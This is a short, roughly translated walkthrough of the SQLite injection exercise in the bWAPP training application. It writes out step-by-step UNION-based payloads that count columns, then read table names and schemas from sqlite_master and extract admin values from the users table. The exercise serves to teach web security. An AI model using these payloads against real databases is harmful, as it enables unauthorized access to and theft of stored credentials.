The Bwapp of SQL injection sqli_11.php

SQL Injection (SQLite)

First of all, the Sqlite,sqlite contains a built-in table "Sqlite_master" that stores the type, name, Tbl_name, Rootpage, and SQL five fields. Where the Name field stores all the table names; the Name field holds all the user tables; SQL holds all the table creation statements, the structure of the table. Start below.

1, input "title=1", the error is "error:hy000", did not find out what the error is, it may be the sign of SQLite error.

2, judge the number of fields, and see the field display bit:
Enter "Title=1 ' ORDER by 6--+" Normal, enter "Title=1 ' ORDER by 7--+" error,


Enter "title=1 ' union select 1,2,3,4,5,6--+",

3. Query Table name:
Enter "title=1" union select 1,2,3,tbl_name,5,6 from Sqlite_master--+ ",

4. Query the Users table structure, that is, the field name:
Enter "title=1" union select 1,2,3,sql,5,6 from Sqlite_master--+ ",

You can see that the table is named users, and the more important fields are admin,password,email; Of course not the admin.
5, query the contents of the field:
Enter "title=1" union select 1,2,3,admin,5,6 from Users--+ ",

Here can only one of the check, can not use the MySQL statement group_concat () function, there may be other methods, if there is Daniel know, do not know Ah, I handed Zuoyi first thanked.

The Bwapp of SQL injection sqli_11.php